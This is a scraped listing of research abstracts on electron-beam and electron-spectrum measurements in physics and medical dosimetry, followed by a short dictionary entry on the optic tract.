stray capacitance, earth capacitance of front resistance is obtained by PSpice simulation. Measured waveforms appear overshoot phenomenon when stray capacitance of front resistance is larger, and the wavefront will be affected when earth capacitance of front resistance is larger. The diode output voltage waveforms of intense electron beam accelerator, are measured by capacitive divider and calibrated by water resistance divider, which is accordance with that measured by a resistive divider, the division ratio is about 563007. The designed capacitive divider can be used to measure high-voltage pulse with 100 ns full width at half maximum. (authors) 12. The energy spectrum of cosmic-ray electrons measured with H.E.S.S International Nuclear Information System (INIS) Egberts, Kathrin 2009-01-01 The spectrum of cosmic-ray electrons has so far been measured using balloon and satellite-based instruments. At TeV energies, however, the sensitivity of such instruments is very limited due to the low flux of electrons at very high energies and small detection areas of balloon/satellite based experiments. The very large collection area of ground-based imaging atmospheric Cherenkov telescopes gives them a substantial advantage over balloon/ satellite based instruments when detecting very-high-energy electrons (> 300 GeV). By analysing data taken by the High Energy Stereoscopic System (H.E.S.S.), this work extends the known electron spectrum up to 4 TeV - a range that is not accessible to direct measurements. However, in contrast to direct measurements, imaging atmospheric Cherenkov telescopes such as H.E.S.S. detect air showers that cosmic-ray electrons initiate in the atmosphere rather than the primary particle. Thus, the main challenge is to differentiate between air showers initiated by electrons and those initiated by the hadronic background. A new analysis technique was developed that determines the background with the support of the machine-learning algorithm Random Forest. It is shown that this analysis technique can also be applied in other areas such as the analysis of diffuse γ rays from the Galactic plane. (orig.) 13. The energy spectrum of cosmic-ray electrons measured with H.E.S.S. Energy Technology Data Exchange (ETDEWEB) Egberts, Kathrin 2009-03-30 The spectrum of cosmic-ray electrons has so far been measured using balloon and satellite-based instruments. At TeV energies, however, the sensitivity of such instruments is very limited due to the low flux of electrons at very high energies and small detection areas of balloon/satellite based experiments. The very large collection area of ground-based imaging atmospheric Cherenkov telescopes gives them a substantial advantage over balloon/ satellite based instruments when detecting very-high-energy electrons (> 300 GeV). By analysing data taken by the High Energy Stereoscopic System (H.E.S.S.), this work extends the known electron spectrum up to 4 TeV - a range that is not accessible to direct measurements. However, in contrast to direct measurements, imaging atmospheric Cherenkov telescopes such as H.E.S.S. detect air showers that cosmic-ray electrons initiate in the atmosphere rather than the primary particle. Thus, the main challenge is to differentiate between air showers initiated by electrons and those initiated by the hadronic background. A new analysis technique was developed that determines the background with the support of the machine-learning algorithm Random Forest. It is shown that this analysis technique can also be applied in other areas such as the analysis of diffuse {gamma} rays from the Galactic plane. (orig.) 14. SEM technique for imaging and measuring electronic transport in nanocomposites based on electric field induced contrast Science.gov (United States) Jesse, Stephen [Knoxville, TN; Geohegan, David B [Knoxville, TN; Guillorn, Michael [Brooktondale, NY 2009-02-17 Methods and apparatus are described for SEM imaging and measuring electronic transport in nanocomposites based on electric field induced contrast. A method includes mounting a sample onto a sample holder, the sample including a sample material; wire bonding leads from the sample holder onto the sample; placing the sample holder in a vacuum chamber of a scanning electron microscope; connecting leads from the sample holder to a power source located outside the vacuum chamber; controlling secondary electron emission from the sample by applying a predetermined voltage to the sample through the leads; and generating an image of the secondary electron emission from the sample. An apparatus includes a sample holder for a scanning electron microscope having an electrical interconnect and leads on top of the sample holder electrically connected to the electrical interconnect; a power source and a controller connected to the electrical interconnect for applying voltage to the sample holder to control the secondary electron emission from a sample mounted on the sample holder; and a computer coupled to a secondary electron detector to generate images of the secondary electron emission from the sample. 15. Moving gantry method for electron beam dose profile measurement at extended source-to-surface distances. Science.gov (United States) Fekete, Gábor; Fodor, Emese; Pesznyák, Csilla 2015-03-08 A novel method has been put forward for very large electron beam profile measurement. With this method, absorbed dose profiles can be measured at any depth in a solid phantom for total skin electron therapy. Electron beam dose profiles were collected with two different methods. Profile measurements were performed at 0.2 and 1.2 cm depths with a parallel plate and a thimble chamber, respectively. 108cm × 108 cm and 45 cm × 45 cm projected size electron beams were scanned by vertically moving phantom and detector at 300 cm source-to-surface distance with 90° and 270° gantry angles. The profiles collected this way were used as reference. Afterwards, the phantom was fixed on the central axis and the gantry was rotated with certain angular steps. After applying correction for the different source-to-detector distances and incidence of angle, the profiles measured in the two different setups were compared. Correction formalism has been developed. The agreement between the cross profiles taken at the depth of maximum dose with the 'classical' scanning and with the new moving gantry method was better than 0.5 % in the measuring range from zero to 71.9 cm. Inverse square and attenuation corrections had to be applied. The profiles measured with the parallel plate chamber agree better than 1%, except for the penumbra region, where the maximum difference is 1.5%. With the moving gantry method, very large electron field profiles can be measured at any depth in a solid phantom with high accuracy and reproducibility and with much less time per step. No special instrumentation is needed. The method can be used for commissioning of very large electron beams for computer-assisted treatment planning, for designing beam modifiers to improve dose uniformity, and for verification of computed dose profiles. 16. High-effective position time spectrometer in actual measurements of low intensity region of electron spectra International Nuclear Information System (INIS) Babenkov, M.I.; Zhdanov, V.S. 2002-01-01 Magnetic position-time spectrometer was proposed in previous work, where not only electron coordinates in focal plane are measured by position sensitive detector (PSD) but places of their birth in beta source plane of a large area are fixed using another PSD, situated behind it, by quick effects, accompanying radioactive decay. PSD on the basis of macro-channel plates are used. It is succeeded in position-time spectrometer to combine beta sources of a large area with multichannel registration for a wide energy interval, that efficiency of measurements was two orders of magnitude increase d in comparison magnetic apparatus having PSD only in focal plane. Owing to two detectors' switching on coincidence the relation effect/background in increased minimum on two orders of magnitude in comparison with the same apparatus. At some complication of mathematical analysis it was obtained, that high characteristics of position-time spectrometer are kept during the use the magnetic field, providing double focusing. Owning to this focusing the gain the efficiency of measurements will make one more order of magnitude. Presented high-effective position-time spectrometer is supposed to use in the measurements of low-intensity region of electron spectra, which are important for development of fundamental physics. This is the first of all estimation of electron anti-neutrino mass by the form of beta spectrum of tritium in the region of boundary energy. Recently here there was problem of non physical negative values. This problem can be solved by using in measurement of different in principle high-effective spectrometers, which possess improved background properties. A position-time spectrometers belongs to these apparatus, which provides the best background conditions at very large effectiveness of the measurements of tritium beta spectrum in the region of boundary energy with acceptable high resolution. An important advantage of position-time spectrometer is the possibility of 17. Surface electronic transport measurements: A micro multi-point probe approach DEFF Research Database (Denmark) Barreto, Lucas 2014-01-01 This work is mostly focused on the study of electronic transport properties of two-dimensional materials, in particular graphene and topological insulators. To study these, we have improved a unique micro multi-point probe instrument used to perform transport measurements. Not only the experimental...... quantities are extracted, such as conductivity, carrier density and carrier mobility. • A method to insulate electrically epitaxial graphene grown on metals, based on a stepwise intercalation methodology, is developed and transport measurements are performed in order to test the insulation. • We show...... a direct measurement of the surface electronic transport on a bulk topological insulator. The surface state conductivity and mobility are obtained. Apart from transport properties, we also investigate the atomic structure of the Bi2Se3(111) surface via surface x-ray diraction and low-energy electron... 18. Electron spectroscopy measurements with a shifted analyzing plane setting in the KATRIN main spectrometer Energy Technology Data Exchange (ETDEWEB) Dyba, Stephan [Institut fuer Kernphysik, Uni Muenster (Germany); Collaboration: KATRIN-Collaboration 2016-07-01 With the KATRIN (KArlsruhe TRItium Neutrino) experiment the endpoint region of the tritium beta decay will be measured to determine the electron-neutrino mass with a sensitivity of 200 meV/c{sup 2} (90% C.L.). For the high precision which is needed to achieve the sub-eV range a MAC-E filter type spectrometer is used to analyze the electron energy. To understand the various background contributions inside the spectrometer vessel different electric and magnetic field settings were investigated during the last commissioning phase. This talk will focus on the so called shifted analyzing plane measurement in which the field settings were tuned in a way to provide non standard potential barriers within the spectrometer. The different settings allowed to perform a spectroscopic measurement, determining the energy spectrum of background electrons born within the spectrometer. 19. Light Quality Affects Chloroplast Electron Transport Rates Estimated from Chl Fluorescence Measurements. Science.gov (United States) Evans, John R; Morgan, Patrick B; von Caemmerer, Susanne 2017-10-01 Chl fluorescence has been used widely to calculate photosynthetic electron transport rates. Portable photosynthesis instruments allow for combined measurements of gas exchange and Chl fluorescence. We analyzed the influence of spectral quality of actinic light on Chl fluorescence and the calculated electron transport rate, and compared this with photosynthetic rates measured by gas exchange in the absence of photorespiration. In blue actinic light, the electron transport rate calculated from Chl fluorescence overestimated the true rate by nearly a factor of two, whereas there was closer agreement under red light. This was consistent with the prediction made with a multilayer leaf model using profiles of light absorption and photosynthetic capacity. Caution is needed when interpreting combined measurements of Chl fluorescence and gas exchange, such as the calculation of CO2 partial pressure in leaf chloroplasts. © Crown copyright 2017. 20. Measurements of energy spectra of fast electrons from PF-1000 in the upstream and downstream directions Energy Technology Data Exchange (ETDEWEB) Kwiatkowski, R.; Czaus, K.; Skladnik-Sadowska, E.; Malinowski, K.; Zebrowski, J. [The Andrzej Soltan Institute for Nuclear Studies (IPJ), 05-400 Otwock-Swierk (Poland); Sadowski, M.J. [The Andrzej Soltan Institute for Nuclear Studies (IPJ), 05-400 Otwock-Swierk (Poland); Karpinski, L.; Paduch, M.; Scholz, M. [Institute of Plasma Physics and Laser Microfusion (IPPLM), 01-497 Warsaw (Poland); Kubes, P. [Czech Technical University (CVUT), 166-27 Prague, (Czech Republic) 2011-07-01 The paper describes measurements of energy spectra of electrons emitted in the upstream direction along the symmetry-axis of the PF-1000 facility, operated with the deuterium filling at 21 kV, 290 kJ. The measurements were performed with a magnetic analyzer. The same analyzer was used to measure also electron beams emitted in along the symmetry-axis in the downstream direction. The recorded spectra showed that the electron-beams emitted in the upstream direction have energies in the range from about 40 keV to about 800 keV, while those in the downstream direction have energies in the range from about 60 keV to about 200 keV. These spectra confirm that in the PF (Plasma Focus) plasma column there appear strong local fields accelerating charged particles in different directions. This document is composed of a paper and a poster. (authors) 1. Temperature gradient scale length measurement: A high accuracy application of electron cyclotron emission without calibration Energy Technology Data Exchange (ETDEWEB) Houshmandyar, S., E-mail: [email protected]; Phillips, P. E.; Rowan, W. L. [Institute for Fusion Studies, The University of Texas at Austin, Austin, Texas 78712 (United States); Yang, Z. J. [Huazhong University of Science and Technology, Wuhan, Hubei 430074 (China); Hubbard, A. E.; Rice, J. E.; Hughes, J. W.; Wolfe, S. M. [Plasma Science and Fusion Center, Massachusetts Institute of Technology, Cambridge, Massachusetts 02129 (United States) 2016-11-15 Calibration is a crucial procedure in electron temperature (T{sub e}) inference from a typical electron cyclotron emission (ECE) diagnostic on tokamaks. Although the calibration provides an important multiplying factor for an individual ECE channel, the parameter ΔT{sub e}/T{sub e} is independent of any calibration. Since an ECE channel measures the cyclotron emission for a particular flux surface, a non-perturbing change in toroidal magnetic field changes the view of that channel. Hence the calibration-free parameter is a measure of T{sub e} gradient. B{sub T}-jog technique is presented here which employs the parameter and the raw ECE signals for direct measurement of electron temperature gradient scale length. 2. Heated electron distributions from resonant absorption International Nuclear Information System (INIS) DeGroot, J.S.; Tull, J.E. 1975-01-01 A simplified model of resonant absorption of obliquely incident laser light has been developed. Using a 1.5 dimensional electrostatic simulation computer code, it is shown that the inclusion of ion motion is critically important in determining the heated electron distributions from resonant absorption. The electromagnetic wave drives up an electron plasma wave. For long density scale lengths (Lapprox. =10 3 lambda/subD//sube/), the phase velocity of this wave is very large (ω/kapproximately-greater-than10V/sub th/) so that if heating does occur, a suprathermal tail of very energetic electrons is produced. However, the pressure due to this wave steepens the density profile until the density gradient scale length near the critical density (where the local plasma frequency equals the laser frequency) is of order 20lambda/subD//sube/. The electrostatic wave is thus forced to have a much lower phase velocity (ω/kapprox. =2.5V/sub th/). In this case, more electrons are heated to much lower velocities. The heated electron distributions are exponential in velocity space. Using a simple theory it is shown that this property of profile steepening applies to most of a typical laser fusion pulse. This steepening raises the threshold for parametric instabilities near the critical surface. Thus, the extensive suprathermal electron distributions typically produced by these parametric instabilities can be drastically reduced 3. Synchrotron-based measurements of the electronic structure of the organic semiconductor copper phthalocyanine International Nuclear Information System (INIS) Downes, J.E. 2004-01-01 Full text: Copper phthalocyanine (CuPc) is a prototypical molecular organic semiconductor that is currently used in the construction of many organic electronic devices such as organic light emitting diodes (OLEDs). Although the material is currently being used, and despite many experimental and theoretical studies, it's detailed electronic structure is still not completely understood. This is likely due to two key factors. Firstly, the interaction of the Cu 3d and phthalocyanine ligand 2p electrons leads to the formation of a complex arrangement of localized and delocalized states near the Fermi level. Secondly, thin films of the material are subject to damage by the photon beam used to make measurements of their electronic structure. Using the synchrotron-based techniques of soft x-ray emission spectroscopy (XES) and x-ray photoemission spectroscopy (XPS), we have measured the detailed electronic structure of in-situ grown thin film samples of CuPc. Beam damage was minimized by continuous translation of the sample during data acquisition. The results obtained differ significantly from previous XES and ultraviolet photoemission measurements, but are in excellent agreement with recent density functional calculations. The reasons for these discrepancies will be explained, and their implications for future measurements on similar materials will be explored 4. Measurements of electron-proton elastic cross sections for 0.4 2 2 International Nuclear Information System (INIS) Christy, M.E.; Ahmidouch, Abdellah; Armstrong, Christopher; Arrington, John; Razmik Asaturyan; Steven Avery; Baker, O.; Douglas Beck; Henk Blok; Bochna, C.W.; Werner Boeglin; Peter Bosted; Maurice Bouwhuis; Herbert Breuer; Brown, D.S.; Antje Bruell; Roger Carlini; Nicholas Chant; Anthony Cochran; Leon Cole; Samuel Danagoulian; Donal Day; James Dunne; Dipangkar Dutta; Rolf Ent; Howard Fenker; Fox, B.; Liping Gan; Haiyan Gao; Kenneth Garrow; David Gaskell; Ashot Gasparian; Don Geesaman; Paul Gueye; Mark Harvey; Roy Holt; Xiaodong Jiang; Cynthia Keppel; Edward Kinney; Yongguang Liang; Wolfgang Lorenzon; Allison Lung; Pete Markowitz; Martin, J.W.; Kevin McIlhany; Daniella Mckee; David Meekins; Miller, J.W.; Richard Milner; Joseph Mitchell; Hamlet Mkrtchyan; Robert Mueller; Alan Nathan; Gabriel Niculescu; Maria-Ioana Niculescu; Thomas O'neill; Vassilios Papavassiliou; Stephen Pate; Buz Piercey; David Potterveld; Ronald Ransome; Joerg Reinhold; Rollinde, E.; Philip Roos; Adam Sarty; Reyad Sawafta; Elaine Schulte; Edwin Segbefia; Smith, C.; Stepan Stepanyan; Steffen Strauch; Vardan Tadevosyan; Liguang Tang; Raphael Tieulent; Alicia Uzzle; William Vulcan; Stephen Wood; Feng Xiong; Lulin Yuan; Markus Zeier; Benedikt Zihlmann; Vitaliy Ziskin 2004-01-01 We report on precision measurements of the elastic cross section for electron-proton scattering performed in Hall C at Jefferson Lab. The measurements were made at 28 unique kinematic settings covering a range in momentum transfer of 0.4 2 2 . These measurements represent a significant contribution to the world's cross section data set in the Q 2 range where a large discrepancy currently exists between the ratio of electric to magnetic proton form factors extracted from previous cross section measurements and that recently measured via polarization transfer in Hall A at Jefferson Lab 5. Measurements of fast electron beams and soft X-ray emission from plasma-focus experiments Directory of Open Access Journals (Sweden) Surała Władysław 2016-06-01 Full Text Available The paper reports results of the recent experimental studies of pulsed electron beams and soft X-rays in plasma-focus (PF experiments carried out within a modified PF-360U facility at the NCBJ, Poland. Particular attention was focused on time-resolved measurements of the fast electron beams by means of two different magnetic analyzers, which could record electrons of energy ranging from about 41 keV to about 715 keV in several (6 or 8 measuring channels. For discharges performed with the pure deuterium filling, many strong electron signals were recorded in all the measuring channels. Those signals were well correlated with the first hard X-ray pulse detected by an external scintillation neutron-counter. In some of the analyzer channels, electron spikes (lasting about dozens of nanoseconds and appearing in different instants after the current peculiarity (so-called current dip were also recorded. For several discharges, fast ion beams, which were emitted along the z-axis and recorded with nuclear track detectors, were also investigated. Those measurements confirmed a multibeam character of the ion emission. The time-integrated soft X-ray images, which were taken side-on by means of a pinhole camera and sensitive X-ray films, showed the appearance of some filamentary structures and so-called hot spots. The application of small amounts of admixtures of different heavy noble gases, i.e. of argon (4.8% volumetric, krypton (1.6% volumetric, or xenon (0.8% volumetric, decreased intensity of the recorded electron beams, but increased intensity of the soft X-ray emission and showed more distinct and numerous hot spots. The recorded electron spikes have been explained as signals produced by quasi-mono-energetic microbeams emitted from tiny sources (probably plasma diodes, which can be formed near the observed hot spots. 6. All-optical time-resolved measurement of laser energy modulation in a relativistic electron beam Directory of Open Access Journals (Sweden) D. Xiang 2011-11-01 Full Text Available We propose and demonstrate an all-optical method to measure laser energy modulation in a relativistic electron beam. In this scheme the time-dependent energy modulation generated from the electron-laser interaction in an undulator is converted into time-dependent density modulation with a chicane, which is measured to infer the laser energy modulation. The method, in principle, is capable of simultaneously providing information on femtosecond time scale and 10^{-5} energy scale not accessible with conventional methods. We anticipate that this method may have wide applications in many laser-based advanced beam manipulation techniques. 7. Method of measuring directed electron velocities in flowing plasma using the incoherent regions of laser scattering International Nuclear Information System (INIS) Jacoby, B.A.; York, T.M. 1979-02-01 With the presumption that a shifted Maxwellian velocity distribution adequately describes the electrons in a flowing plasma, the details of a method to measure their directed velocity are described. The system consists of a ruby laser source and two detectors set 180 0 from each other and both set at 90 0 with respect to the incident laser beam. The lowest velocity that can be determined by this method depends on the electron thermal velocity. The application of this diagnostic to the measurement of flow velocities in plasma being lost from the ends of theta-pinch devices is described 8. Prospects for Measuring $\\Delta$G from Jets at HERA with Polarized Protons and Electrons CERN Document Server De Roeck, A.; Kunne, F.; Maul, M.; Schafer, A.; Wu, C.Y.; Mirkes, E.; Radel, G. 1996-01-01 The measurement of the polarized gluon distribution function Delta G(x) from photon-gluon fusion processes in electron-proton deep inelastic scattering producing two jets has been investigated. The study is based on the MEPJET and PEPSI simulation programs. The size of the expected spin asymmetry and corresponding statistical uncertainties for a possible measurement with polarized beams of electrons and protons at HERA have been estimated. The results show that the asymmetry can reach a few percent, and is not washed out by hadronization and higher order processes. 9. Prospects for measuring ΔG from jets at HERA with polarized protons and electrons International Nuclear Information System (INIS) Roeck, A. de; Feltesse, J.; Kunne, F.; Maul, M.; Schaefer, A.; Wu, C.Y.; Mirkes, E.; Raedel, G. 1996-09-01 The measurement of the polarized gluon distribution function ΔG(x) from photon-gluon fusion processes in electron-proton deep inelastic scattering producing two jets has been investigated. The study is based on the MEPJET and PEPSI simulation programs. The size of the expected spin asymmetry and corresponding statistical uncertainties for a possible measurement with polarized beams of electrons and protons at HERA have been estimated. The results show that the asymmetry can reach a few percent, and is not washed out by hadronization and higher order processes. (orig.) 10. Thermal expansion coefficient measurement from electron diffraction of amorphous films in a TEM. Science.gov (United States) Hayashida, Misa; Cui, Kai; Malac, Marek; Egerton, Ray 2018-05-01 We measured the linear thermal expansion coefficients of amorphous 5-30 nm thick SiN and 17 nm thick Formvar/Carbon (F/C) films using electron diffraction in a transmission electron microscope. Positive thermal expansion coefficient (TEC) was observed in SiN but negative coefficients in the F/C films. In case of amorphous carbon (aC) films, we could not measure TEC because the diffraction radii required several hours to stabilize at a fixed temperature. Crown Copyright © 2018. Published by Elsevier B.V. All rights reserved. 11. Polarized Bhabha scattering and a precision measurement of the electron neutral current couplings International Nuclear Information System (INIS) Abe, K.; Abt, I.; Ahn, C.J.; Akagi, T.; Ash, W.W.; Aston, D.; Bacchetta, N.; Baird, K.G.; Baltay, C.; Band, H.R.; Barakat, M.B.; Baranko, G.; Bardon, O.; Barklow, T.; Bazarko, A.O.; Ben-David, R.; Benvenuti, A.C.; Bienz, T.; Bilei, G.M.; Bisello, D.; Blaylock, G.; Bogart, J.R.; Bolton, T.; Bower, G.R.; Brau, J.E.; Breidenbach, M.; Bugg, W.M.; Burke, D.; Burnett, T.H.; Burrows, P.N.; Busza, W.; Calcaterra, A.; Caldwell, D.O.; Calloway, D.; Camanzi, B.; Carpinelli, M.; Cassell, R.; Castaldi, R.; Castro, A.; Cavalli-Sforza, M.; Church, E.; Cohn, H.O.; Coller, J.A.; Cook, V.; Cotton, R.; Cowan, R.F.; Coyne, D.G.; D'Oliveira, A.; Damerell, C.J.S.; Dasu, S.; De Sangro, R.; De Simone, P.; Dell'Orso, R.; Dima, M.; Du, P.Y.C.; Dubois, R.; Eisenstein, B.I.; Elia, R.; Falciai, D.; Fan, C.; Fero, M.J.; Frey, R.; Furuno, K.; Gillman, T.; Gladding, G.; Gonzalez, S.; Hallewell, G.D.; Hart, E.L.; Hasegawa, Y.; Hedges, S.; Hertzbach, S.S.; Hildreth, M.D.; Huber, J.; Huffer, M.E.; Hughes, E.W.; Hwang, H.; Iwasaki, Y.; Jacques, P.; Jaros, J.; Johnson, A.S.; Johnson, J.R.; Johnson, R.A.; Junk, T.; Kajikawa, R.; Kalelkar, M.; Karliner, I.; Kawahara, H.; Kendall, H.W.; Kim, Y.; King, M.E.; King, R.; Kofler, R.R.; Krishna, N.M.; Kroeger, R.S.; Labs, J.F.; Langston, M.; Lath, A.; Lauber, J.A.; Leith, D.W.G.; Liu, X.; Loreti, M.; Lu, A.; Lynch, H.L.; Ma, J.; Mancinelli, G.; Manly, S.; Mantovani, G.; Markiewicz, T.W.; Maruyama, T.; Massetti, R.; Masuda, H.; Mazzucato, E.; McKemey, A.K.; Meadows, B.T.; Messner, R.; Mockett, P.M.; Moffeit, K.C.; Mours, B.; Mueller, G.; Muller, D.; Nagamine, T.; Nauenberg, U.; Neal, H.; Nussbaum, M.; Ohnishi, Y.; Osborne, L.S.; Panvini, R.S.; Park, H.; Pavel, T.J.; Peruzzi, I.; Pescara, L.; Piccolo, M.; Piemontese, L.; Pieroni, E.; Pitts, K.T.; Plano, R.J.; Prepost, R.; Prescott, C.Y.; Punkar, G.D.; Quigley, J.; Ratcliff, B.N.; Reeves, T.W.; Rensing, P.E.; Rochester, L.S.; Rothberg, J.E.; Rowson, P.C.; Russell, J.J.; Saxton, O.H.; Schalk, T. 1995-01-01 Bhabha scattering with polarized electrons at the Z 0 resonance has been measured with the SLD experiment at the SLAC Linear Collider. The first measurement of the left-right asymmetry in Bhabha scattering is presented, yielding the effective weak mixing angle of sinθ eff W =0.2245±0.0049±0.0010. The effective electron couplings to the Z 0 are extracted from a combined analysis of polarized Bhabha scattering and the left-right asymmetry previously published: υ e =-0.0414±0.0020 and a e =-0.4977±0.0045 12. Measurements made in the SPS with a rest gas profile monitor by collecting electrons International Nuclear Information System (INIS) Fischer, C.; Koopman, J. 2000-01-01 Measurements have regularly been performed during the 1999 run, using the Rest Gas Monitor installed in the SPS. The exploited signal resulted from electrons produced by ionization of the rest gas during the circulating beam passage. A magnetic field parallel to the electric extraction field was applied to channel the electrons. Proton beam horizontal transverse distributions were recorded during entire SPS acceleration cycles, between 14 GeV/c and 450 GeV/c and for different beam structures and bunch intensities. The influence of several parameters on the measured beam profiles was investigated. Results are presented and analyzed in order to determine the performance that can be expected 13. Measurements of high-current electron beams from X pinches and wire array Z pinches International Nuclear Information System (INIS) Shelkovenko, T. A.; Pikuz, S. A.; Blesener, I. C.; McBride, R. D.; Bell, K. S.; Hammer, D. A.; Agafonov, A. V.; Romanova, V. M.; Mingaleev, A. R. 2008-01-01 Some issues concerning high-current electron beam transport from the X pinch cross point to the diagnostic system and measurements of the beam current by Faraday cups are discussed. Results of computer simulation of electron beam propagation from the pinch to the Faraday cup give limits for the measured current for beams having different energy spreads. The beam is partially neutralized as it propagates from the X pinch to a diagnostic system, but within a Faraday cup diagnostic, space charge effects can be very important. Experimental results show evidence of such effects. 14. Measurements of eye lens doses in interventional cardiology using OSL and electronic dosemeters International Nuclear Information System (INIS) Sanchez, R.M.; Vano, E.; Fernandez, J.M.; Ginjaume, M.; Duch, M.A. 2014-01-01 The purpose of this paper is to test the appropriateness of OSL and electronic dosemeters to estimate eye lens doses at interventional cardiology environment. Using TLD as reference detectors, personal dose equivalent was measured in phantoms and during clinical procedures. For phantom measurements, OSL dose values resulted in an average difference of 215 % vs. TLD. Tests carried out with other electronic dosemeters revealed differences up to ±20 % versus TLD. With dosemeters positioned outside the goggles and when TLD doses were >20 μSv, the average difference OSL vs. TLD was 29 %. Eye lens doses of almost 700 μSv per procedure were measured in two cases out of a sample of 33 measurements in individual clinical procedures, thus showing the risk of high exposure to the lenses of the eye when protection rules are not followed. The differences found between OSL and TLD are acceptable for the purpose and range of doses measured in the survey (authors) 15. Direct measurement of electron beam quality conversion factors using water calorimetry Energy Technology Data Exchange (ETDEWEB) Renaud, James, E-mail: [email protected]; Seuntjens, Jan [Medical Physics Unit, McGill University, Montréal, Québec H3G 1A4 (Canada); Sarfehnia, Arman [Medical Physics Unit, McGill University, Montréal, Québec H3G 1A4, Canada and Department of Radiation Oncology, University of Toronto, Toronto, Ontario M5S 3E2 (Canada); Marchant, Kristin [Allan Blair Cancer Centre, Saskatchewan Cancer Agency, Regina, Saskatchewan S4T 7T1, Canada and Department of Oncology, University of Saskatchewan, Saskatoon, Saskatchewan S7N 5A1 (Canada); McEwen, Malcolm; Ross, Carl [Ionizing Radiation Standards, National Research Council of Canada, Ottawa, Ontario K1A 0R6 (Canada) 2015-11-15 Purpose: In this work, the authors describe an electron sealed water calorimeter (ESWcal) designed to directly measure absorbed dose to water in clinical electron beams and its use to derive electron beam quality conversion factors for two ionization chamber types. Methods: A functioning calorimeter prototype was constructed in-house and used to obtain reproducible measurements in clinical accelerator-based 6, 9, 12, 16, and 20 MeV electron beams. Corrections for the radiation field perturbation due to the presence of the glass calorimeter vessel were calculated using Monte Carlo (MC) simulations. The conductive heat transfer due to dose gradients and nonwater materials was also accounted for using a commercial finite element method software package. Results: The relative combined standard uncertainty on the ESWcal dose was estimated to be 0.50% for the 9–20 MeV beams and 1.00% for the 6 MeV beam, demonstrating that the development of a water calorimeter-based standard for electron beams over such a wide range of clinically relevant energies is feasible. The largest contributor to the uncertainty was the positioning (Type A, 0.10%–0.40%) and its influence on the perturbation correction (Type B, 0.10%–0.60%). As a preliminary validation, measurements performed with the ESWcal in a 6 MV photon beam were directly compared to results derived from the National Research Council of Canada (NRC) photon beam standard water calorimeter. These two independent devices were shown to agree well within the 0.43% combined relative uncertainty of the ESWcal for this beam type and quality. Absorbed dose electron beam quality conversion factors were measured using the ESWcal for the Exradin A12 and PTW Roos ionization chambers. The photon-electron conversion factor, k{sub ecal}, for the A12 was also experimentally determined. Nonstatistically significant differences of up to 0.7% were found when compared to the calculation-based factors listed in the AAPM’s TG-51 protocol 16. Direct measurement of electron beam quality conversion factors using water calorimetry. Science.gov (United States) Renaud, James; Sarfehnia, Arman; Marchant, Kristin; McEwen, Malcolm; Ross, Carl; Seuntjens, Jan 2015-11-01 In this work, the authors describe an electron sealed water calorimeter (ESWcal) designed to directly measure absorbed dose to water in clinical electron beams and its use to derive electron beam quality conversion factors for two ionization chamber types. A functioning calorimeter prototype was constructed in-house and used to obtain reproducible measurements in clinical accelerator-based 6, 9, 12, 16, and 20 MeV electron beams. Corrections for the radiation field perturbation due to the presence of the glass calorimeter vessel were calculated using Monte Carlo (MC) simulations. The conductive heat transfer due to dose gradients and nonwater materials was also accounted for using a commercial finite element method software package. The relative combined standard uncertainty on the ESWcal dose was estimated to be 0.50% for the 9-20 MeV beams and 1.00% for the 6 MeV beam, demonstrating that the development of a water calorimeter-based standard for electron beams over such a wide range of clinically relevant energies is feasible. The largest contributor to the uncertainty was the positioning (Type A, 0.10%-0.40%) and its influence on the perturbation correction (Type B, 0.10%-0.60%). As a preliminary validation, measurements performed with the ESWcal in a 6 MV photon beam were directly compared to results derived from the National Research Council of Canada (NRC) photon beam standard water calorimeter. These two independent devices were shown to agree well within the 0.43% combined relative uncertainty of the ESWcal for this beam type and quality. Absorbed dose electron beam quality conversion factors were measured using the ESWcal for the Exradin A12 and PTW Roos ionization chambers. The photon-electron conversion factor, kecal, for the A12 was also experimentally determined. Nonstatistically significant differences of up to 0.7% were found when compared to the calculation-based factors listed in the AAPM's TG-51 protocol. General agreement between the relative 17. Shielded button electrodes for time-resolved measurements of electron cloud buildup International Nuclear Information System (INIS) Crittenden, J.A.; Billing, M.G.; Li, Y.; Palmer, M.A.; Sikora, J.P. 2014-01-01 We report on the design, deployment and signal analysis for shielded button electrodes sensitive to electron cloud buildup at the Cornell Electron Storage Ring. These simple detectors, derived from a beam-position monitor electrode design, have provided detailed information on the physical processes underlying the local production and the lifetime of electron densities in the storage ring. Digitizing oscilloscopes are used to record electron fluxes incident on the vacuum chamber wall in 1024 time steps of 100 ps or more. The fine time steps provide a detailed characterization of the cloud, allowing the independent estimation of processes contributing on differing time scales and providing sensitivity to the characteristic kinetic energies of the electrons making up the cloud. By varying the spacing and population of electron and positron beam bunches, we map the time development of the various cloud production and re-absorption processes. The excellent reproducibility of the measurements also permits the measurement of long-term conditioning of vacuum chamber surfaces 18. Ultra-violet recombination continuum electron temperature measurements in a non-equilibrium atmospheric argon plasma International Nuclear Information System (INIS) Gordon, M.H.; Kruger, C.H. 1991-01-01 Emission measurements of temperature and electron density have been made downstream of a 50 kW induction plasma torch at temperatures and electron densities ranging between 6000 K and 8500 K and 10 to the 20th and 10 to the 21st/cu cm, respectively. Absolute and relative atomic line intensities, and absolute recombination continuum in both the visible and the UV were separately interpreted in order to characterize a recombining atmospheric argon plasma.
__label__pos
0.658887
optic tract Also found in: Thesaurus, Medical, Legal, Financial, Encyclopedia, Wikipedia. Related to optic tract: optic radiation ThesaurusAntonymsRelated WordsSynonymsLegend: Noun1.optic tract - the cranial nerve that serves the retinaoptic tract - the cranial nerve that serves the retina visual system - the sensory system for vision cranial nerve - any of the 12 paired nerves that originate in the brain stem betweenbrain, diencephalon, interbrain, thalmencephalon - the posterior division of the forebrain; connects the cerebral hemispheres with the mesencephalon References in periodicals archive ? Objective: "The present project aims at casting light on the neural and cognitive reorganization of visual function following unilateral lesion at various levels of the central visual system such as optic tract, optic radiation, primary visual cortex, extrastriate visual areas. Mealy said: the retrobulbar, canalicular, and prechiasmal segments; the chiasm; and the optic tract extending into the brain. Ocular and ocular-plus congenital blindness can be distinguished based on the cause of blindness located either before the optic tract (ocular blindness) or within the optic tract and further in the brain tissue (ocular-plus blindness).
__label__pos
0.53572
